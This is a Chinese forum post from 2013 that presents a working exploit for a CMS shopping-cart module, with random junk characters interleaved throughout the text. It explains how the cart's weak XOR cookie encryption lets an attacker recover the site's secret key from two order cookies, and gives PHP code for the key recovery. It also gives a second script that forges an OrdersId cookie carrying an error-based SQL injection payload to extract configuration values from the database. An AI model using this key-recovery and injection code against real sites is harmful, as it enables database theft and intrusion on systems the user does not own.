www.xxx.com/plus/search.php?keyword=
7 G; ~0 n+ |+ p" }6 q8 v在 include/shopcar.class.php中: w6 a$ p7 q+ W* R- G. K
先看一下这个shopcar类是如何生成cookie的
0 p6 ~1 w9 F) _" r/ U239 function saveCookie($key,$value)1 k' U; j2 Q! o$ @2 D x$ Y$ `
240 {" c% s) d- }! z/ k1 p8 s9 s/ H( \
241 if(is_array($value)); h' F, \. F3 y
242 {6 {+ D- o5 V! Z! a1 l( O4 k1 }5 a/ G
243 $value = $this->enCrypt($this->enCode($value));
8 }) ?9 X ~3 K0 m+ g3 _7 h244 }2 F: x) `9 H! E- A
245 else# m$ [$ l v+ I/ F$ y
246 {. A( b: p; L6 b6 I' V" Z
247 $value = $this->enCrypt($value);
$ s$ N, Z6 o4 d1 H1 J248 }
/ [. R9 Q$ O* E1 `( [5 N249 setcookie($key,$value,time()+36000,’/');( C% [) |9 z) e$ H2 u4 p0 W) [8 N3 t
250 }
+ l3 e7 I2 y6 x/ D简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数
" n) Y$ B& f( F7 W( J+ s* {' W186 function enCrypt($txt)/ l5 B3 K0 F; @; D+ H" ^, ]
187 {4 M) ~9 u f8 ]0 S
188 srand((double)microtime() * 1000000);! I9 n2 H2 G. |3 o0 V( o
189 $encrypt_key = md5(rand(0, 32000));& ~) D* P) J) |: `: F* O# K: H
190 $ctr = 0;, O& y) L" n, _8 u6 V, D6 I
191 $tmp = ”;
0 a8 F! q) }7 V# b6 e192 for($i = 0; $i < strlen($txt); $i++)2 Z+ y9 ?6 K; L6 C/ s/ i1 }
193 {# a2 Q" P/ H# k- l9 m9 }
194 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;4 T7 a7 t, {) F$ v, R. P
195 $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);# I# w! l5 D: K, g5 r3 S
196 }7 y+ o' n9 O- u
197 return base64_encode($this->setKey($tmp));
/ E2 N+ z6 C' x, }, E198 }
( v* ~2 a% O: h213 function setKey($txt)
2 k v9 S' l3 z* E214 {! `: Z# x. `7 h& X" Q, [
215 global $cfg_cookie_encode;
1 f0 n9 p- f+ s5 X216 $encrypt_key = md5(strtolower($cfg_cookie_encode));
2 E; g* {" K; }1 L/ M4 l7 O217 $ctr = 0;7 C5 }# U7 d2 N% m
218 $tmp = ”;
: q! ?3 c( W, \* Q+ U; P) \) o7 W219 for($i = 0; $i < strlen($txt); $i++)
; v L0 \: x4 Z( n7 [ X2 T220 {
; Q3 ?% `9 O; \, X. P4 Z221 $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
6 v' m: O+ K: t% f) F! G222 $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];7 e) R. s6 R) ~ X. |- a! ~
223 }
5 Z1 L; M5 I# N: p224 return $tmp;
0 a* q _( C! r# i3 H& h225 }
/ i# p4 }! `7 K2 o. menCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的! Q+ [9 r+ ^' r0 t
然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
* r" J1 s$ @- c& t8 x& c具体代码如下:
' |8 T; @$ m# p8 ]<?php
6 R9 e2 B4 Q( @) a' h+ Y$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here2 L5 z# }3 _+ \; Z- h0 ^
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
' C* u2 h0 W4 L4 k$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here/ w; R3 J8 x, ~. f
function reStrCode($code,$string)
2 H, ?5 i5 R u. K% Y{& m; K" b" a7 K% Q' D
$code = base64_decode($code);
9 t1 p7 ~# p2 Z7 v( W- Z4 U! O$key = “”;
4 W2 F) \# x0 l. W/ j1 Qfor($i=0 ; $i<32 ; $i++)- ?7 \+ j. Y& a# H8 ~: B4 u' G
{, Q1 X! O) O0 _ a
$key .= $string[$i] ^ $code[$i];
" U8 `+ L7 j# @7 s" d0 J}: R9 i* r. y i. g
return $key;
2 {/ Y. a7 D9 Z3 p" k}
$ P/ j+ P9 l& @% g1 }- }6 R9 Zfunction getKeys($cookie,$plantxt)
: P# k2 i1 x" k3 G- r/ T7 Q' p{
( c; A2 Z/ m$ P" F( g$tmp = $cookie;# k# B- R4 H" M4 a$ T* L
$results = array(); u4 V. o( W" d) Z
for($j=0 ; $j < 32000; $j++)
0 y# P X# y2 [* L3 k+ ?{
5 p9 k5 g" g/ ]3 p* N$ i9 [. d7 U! ?% m; v0 m; I$ l5 s
$txt = $plantxt;
8 ^3 t3 H7 M1 c7 f$ctr = 0;0 ~9 G; `6 }9 e# ~
$tmp = ”;! G# m: O; ]/ b0 p0 ~) ~# @
$encrypt_key = md5($j);! X$ _$ O! F, @' |: y! P9 k Q
for($i =0; $i < strlen($txt); $i ++)
; X/ T/ F% E _, s: E: J* Q2 q{. ] i. r4 g# R$ E' v: W) m0 z
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
P) k' T) i5 i/ r7 D& ]6 T$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
2 B) ~* @* f" U' f$ e}
4 T% A6 q( n) W2 [# A* }( V" @$string = $tmp;
}8 A) o7 a5 q% i0 w# t$code = $cookie; W7 E5 M F1 j( L: H' w- H1 C. _8 C
$result = reStrCode($code,$string);4 b. x, [- p z* a7 y6 g4 A
if(eregi(‘^[a-z0-9]+$’,$result))
3 z; q3 Q0 i6 f7 `% O{
8 W8 S% L6 V$ m3 _* Q: q$ ~ cecho $result.”\n”;
+ B- `8 W+ K X. N* o' `" e5 ~- `$results[] = $result;
; a H3 K. _1 q# |8 i2 g9 O}
- L4 } Z0 t' q! l" R$ v}$ ]3 f# D# @" @$ H2 B/ P$ E" J& Q
return $results;4 j. G Q6 |1 }# {
}
! |' g [. C0 S" r. `( t$results1 = getKeys($cookie1,$plantxt);; e& R+ j/ ]! P5 f6 c" }
$results2 = getKeys($cookie2,$plantxt);* S- C! Q+ v" b
print “\n——————–real key————————–\n”;# @2 R$ {; ?) a% C' q; R
foreach($results1 as $test1); v) F$ g+ G& S1 n
{9 @' [9 i7 k! h, S+ o i
foreach($results2 as $test2)6 _& D* p2 J2 p3 y
{
3 i% N9 o6 R! M }/ G+ vif($test1 == $test2)( t/ N7 Z/ b# t& O$ D: {4 _$ u6 E$ D" Q
{
" a# b% a7 p" E$ I+ z# {echo $test1.”\n”;/ d2 V" |5 z3 \% g) M" C! r7 |
}* _4 s# L, s6 M" ~1 [
}
8 a* n( k- C* U% p$ b5 O* {( u" V}
5 ~6 R& L. Z) p/ P& W3 T& m+ w?>" M" C. A ]/ N" o$ A
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
: q6 I0 h$ U& ?# ^! Qplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua17 J" I$ k& d/ a+ L+ f1 t1 y% b
然后推算出md5(strtolower($cfg_cookie_encode))
1 U O& Y8 D0 I6 o6 J得到这个key之后,我们就可以构造任意购物车的cookie
! P$ O/ J$ k) D- K2 |; A; l: _接着看
& L7 R: l6 v' U% v! W! y20 class MemberShops, w- ?2 j" N7 j& H E2 E2 _
21 {
$ U: @' o: ]& [4 p: X d7 O: a22 var $OrdersId;& y) J( K. L# F$ T& T* l
23 var $productsId;
! {5 J2 h* S: |24
1 n2 q3 Y( x2 @; }7 l: b25 function __construct()
9 ]8 t) g8 I) R* e1 D, T# U26 {
5 g; @( k) B0 x% t27 $this->OrdersId = $this->getCookie(“OrdersId”);
5 d/ z, ~) |! W* v# D, \5 {28 if(empty($this->OrdersId))" j) Q' ?, k! p; t
29 {
/ K5 z5 t3 m" h$ O30 $this->OrdersId = $this->MakeOrders();
" ~; ^8 ?- m% k8 L5 @1 s9 X% e31 }
/ E2 k" @% }6 z- n- r+ M* p32 }
3 o3 Z) H5 X' x' f! T. W7 w发现OrderId是从cookie里面获取的7 o' t. Y# {0 \' ^8 t/ d1 V
然后
7 x Q [# T) @& @; k+ H5 O. ]8 r c/plus/carbuyaction.php中的& h$ K$ M% F/ T" t/ H( [! W
29 $cart = new MemberShops();* x w( j" L$ ^2 b
39 $OrdersId = $cart->OrdersId; //本次记录的订单号
4 d- P+ W: x; A) ^7 [……8 D% w4 d- \% u5 ], n
173 $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
! L# C5 s, Z2 V5 q# w6 B接着我们就可以注入了% j* D9 n+ k5 d2 J7 Z
通过利用下面代码生成cookie:
/ [/ ^# v" j. l- k L( v |. @) W<?php9 C' ~ ` y0 h) o
$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
8 r s3 l% r; @2 I$encrypt_key = “9f09293b7419ed68448fb51d5b174834″; // here is the key, please change here+ `& n4 u& y$ E7 B
function setKey($txt); ^4 M; \2 m! E( D$ F
{
- s2 w' P, e1 w. m" lglobal $encrypt_key;, a+ \, h8 A% |, o3 u. m) V
$ctr = 0;. y8 ]& ^# T% P) K2 ?# ]5 D
$tmp = ”;4 D: x# F2 j) r; w! s( `4 x
for($i = 0; $i < strlen($txt); $i++)% d( d4 e1 v- x6 {" |( J& H- T
{8 ]6 R, B! q/ H7 C* r/ K
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
, {. b8 F% x2 a) _3 B+ C! D4 r$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];/ R1 g( A/ B7 t0 I$ \. @
}! |6 `! t6 G6 r2 W2 } p
return $tmp;
% G9 S, B( p+ E}' k( s% Z0 ?* E8 k2 J B# t/ V
function enCrypt($txt)# b1 B& i, b; o) \' T ~8 {' \
{4 ]0 d0 z3 ^2 Q0 R
srand((double)microtime() * 1000000);4 ?, o" d' T# F: w6 o; @3 o
$encrypt_key = md5(rand(0, 32000));. N. K$ f" D8 x
$ctr = 0;3 l6 |( L+ u1 V J# r6 u4 Q
$tmp = ”;
" [( [- {# E7 Y% `4 ], e! Yfor($i = 0; $i < strlen($txt); $i++)$ x3 o, q4 a1 Q; s* Q
{- U+ `5 s& @5 s, S8 R2 ]6 b' v
$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr; p9 z: W+ A: N! T) C
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);
* x5 o' r- o1 Q3 a8 a* W, c* R}
% S( h- m8 j8 ~0 hreturn base64_encode(setKey($tmp));
! Q9 t |( B9 K; Y- s( t0 t% k$ h}
+ @5 n3 P* b4 b; z% @3 x c8 @( U3 mfor($dest =0;$dest = enCrypt($txt);)6 O# E9 ^! K, \ t# w
{
, r8 s" n4 n0 D& A5 e4 I' k% Dif(!strpos($dest,’+'))
N0 l9 b% g! M# o: w{8 T( V7 p; h: |% g# l6 M
break;
8 j7 ^" Z. M) o9 N' R}9 _# i: y: |1 M' ~( ~! N+ Q2 i1 y- u
}, ^2 \. R8 m. @) U
echo $dest.”\n”;! O" U+ h: R5 a B8 x% r
?>, k$ j4 |$ ^5 B9 S3 k
7 o5 M4 l Y+ E2 v" J% o
|
发表于 2013-2-13 23:58:29
收藏
支持
反对